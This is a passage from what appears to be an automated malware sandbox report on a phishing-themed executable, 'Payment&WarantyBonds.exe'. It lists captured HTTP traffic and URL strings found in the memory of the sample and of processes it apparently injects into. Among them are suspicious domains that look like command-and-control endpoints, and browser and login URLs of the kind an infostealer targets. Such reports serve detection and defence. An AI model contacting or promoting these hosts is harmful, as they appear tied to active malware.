61 6d 69 6c 79 3d 45 78 6f 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 74 68 65 57 69 64 74 68 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 73 63 72 65 65 6e 2e 77 69 64 74 68 20 3c 3d 20 34 32 30 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6d 76 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 74 68 65 57 69 64 74 68 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 76 70 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 63 6f 6e 74 65 6e 74 27 2c 27 77 69 64 74 68 3d 34 30 30 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 21 2d 2d 20 63 6c 69 65 6e 74 20 2d 2d 3e 0d 0a 3c 68 65 61 64 65 72 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 31 Oct 2024 00:40:40 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closevary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HaBDA6u5OAiLgOO3iitkTWt7Gzk3nlOpUZdWmStgVbKi76Dk70lYeB8WTo4t%2FTwQoV5A9CUBjDtEMHJ3XbrGWzR47KgsUF5nr7uiegTWjJdJIm%2BfR4PfpnWzcPuiLofp4LcwS35M%2FkrxAA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Content-Encoding: gzipserver-timing: cfL4;desc="?proto=TCP&rtt=1754&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=739&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 31 Oct 2024 00:40:42 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closevary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n44l2GrAdPQ0zSKfCFTruPRhdLcZAiL19XAF4s6HM7j7Z%2Boipc77%2B7F3rlGczdjpJW3B2eO8Vv4FUGBbscOKfTOLkrLMZz42oCtvP8btoq34B6A%2B2rycEueLohmVCJG3OUKKpI49YwfMqg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Content-Encoding: gzipserver-timing: cfL4;desc="?proto=TCP&rtt=1767&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=759&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 31 Oct 2024 00:40:45 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closevary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2WDU6WvB3C9tJ0sIY%2F0d3rdEIqTy%2FKs0g9Lt4eeJVeDrQ5Ha11t9Jz9AARlBhiOIPwccihoKurDxtnYN4%2BE3Ml4IFyEPmz1WgXJ1JCouZnvs4Lu8cEfCM0HzSzhVYij8E0%2FFYX2yqjDOGw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Content-Encoding: gzipserver-timing: cfL4;desc="?proto=TCP&rtt=1970&sent=2&recv=10&lost=0&retrans=0&sent_bytes=0&recv_bytes=10841&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 31 Oct 2024 00:40:47 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closevary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6rb1Hsqw0fAtJt7j%2FD5yS3KpWDyWwmpQnXJ7Fcdjx2RIKZrujqcP6ywLD5tAyhsEc9dB6nSI%2Fzn%2BC3fX0svUGjgIe%2Fi49S%2BfcB8TP%2BvniLhVq7aeTxKH3Uppy0vLyGm0qZVupMsFRtz1JA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}server-timing: cfL4;desc="?proto=TCP&rtt=1808&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=474&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 31 Oct 2024 00:40:54 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 31 Oct 2024 00:40:56 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 31 Oct 2024 00:40:59 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 31 Oct 2024 00:41:01 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Source: systeminfo.exe, 00000007.00000002.4107343980.0000000005306000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.0000000002BB6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://domshow.vhostgo.com/template/img/paimai/banner_jiaoyi.jpg)
Source: systeminfo.exe, 00000007.00000002.4107343980.0000000005306000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.0000000002BB6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://domshow.vhostgo.com/template/img/paimai/jiaoyixq_jiaoyi.jpg)
Source: Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: systeminfo.exe, 00000007.00000002.4107343980.00000000062BA000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.0000000003B6A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.basicreviews.online/cgi-sys/suspendedpage.cgi?78=hLX784qEA4n55Q1oGw1olOPE1jv2cb5vRwpnfGUp
Source: Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: lVlYtqLlYCJP.exe, 00000008.00000002.4108148789.0000000004AD4000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.extrime1.shop
Source: lVlYtqLlYCJP.exe, 00000008.00000002.4108148789.0000000004AD4000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.extrime1.shop/jr4j/
Source: Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: systeminfo.exe, 00000007.00000002.4107343980.000000000594E000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000031FE000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.stationseek.online/wd23?78=hRp9
Source: Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: systeminfo.exe, 00000007.00000002.4109041108.0000000007848000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: systeminfo.exe, 00000007.00000002.4109041108.0000000007848000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: systeminfo.exe, 00000007.00000002.4109041108.0000000007848000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: systeminfo.exe, 00000007.00000002.4109041108.0000000007848000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: systeminfo.exe, 00000007.00000002.4109041108.0000000007848000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: systeminfo.exe, 00000007.00000002.4109041108.0000000007848000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: systeminfo.exe, 00000007.00000002.4109041108.0000000007848000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: systeminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com/css?family=Exo
Source: systeminfo.exe, 00000007.00000002.4108897499.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4107343980.0000000005306000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.0000000002BB6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://hm.baidu.com/hm.js?352bf0fb165ca7ab634d3cea879c7a72
Source: systeminfo.exe, 00000007.00000002.4105934203.0000000000A24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: systeminfo.exe, 00000007.00000002.4105934203.0000000000A24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: systeminfo.exe, 00000007.00000002.4105934203.0000000000A24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: systeminfo.exe, 00000007.00000002.4105934203.0000000000A09000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033t
Source: systeminfo.exe, 00000007.00000002.4105934203.0000000000A24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: systeminfo.exe, 00000007.00000002.4105934203.0000000000A09000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: systeminfo.exe, 00000007.00000003.2209426415.0000000007825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: systeminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://piensasolutions.com/css/parking2.css
Source: systeminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://piensasolutions.com/imgs/parking/icon-desplegar.jpg
Source: systeminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://piensasolutions.com/imgs/parking/icon-facebook-small.png
Source: systeminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://piensasolutions.com/imgs/parking/icon-hosting.png
Source: systeminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://piensasolutions.com/imgs/parking/icon-parking.png
Source: systeminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://piensasolutions.com/imgs/parking/icon-ssl-parking.png
Source: systeminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://piensasolutions.com/imgs/parking/icon-twitter-small.png
Source: systeminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://piensasolutions.com/imgs/parking/icon-web-sencilla.png
Source: systeminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://piensasolutions.com/imgs/parking/icon-web.png
Source: systeminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://plus.google.com/u/0/102310483732773374239
Source: systeminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://shop.piensasolutions.com/search-ajax.php?utm_source=parking&utm_medium=link&utm_camp
Source: systeminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://twitter.com/piensasolutions
Source: systeminfo.exe, 00000007.00000002.4109041108.0000000007848000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: systeminfo.exe, 00000007.00000002.4108897499.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4107343980.0000000005F96000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.0000000003846000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: systeminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.piensasolutions.com/certificado-ssl?utm_source=parking&utm_medium=link&utm_campa
Source: systeminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.piensasolutions.com/crear-web?utm_source=parking&utm_medium=link&utm_campaign=we
Source: systeminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.piensasolutions.com/dominios?utm_source=parking&utm_medium=link&utm_campaign=dom
Source: systeminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.piensasolutions.com/hosting?utm_source=parking&utm_medium=link&utm_campaign=host
Source: systeminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.piensasolutions.com/ssl?utm_source=parking&utm_medium=link&utm_campaign=correo
Source: systeminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.piensasolutions.com/web-sencilla?utm_source=parking&utm_medium=link&utm_campaign
Source: systeminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.piensasolutions.com?utm_source=parking&utm_medium=link&utm_campaign=piensa
Source: lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.0000000002D48000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.strato.de
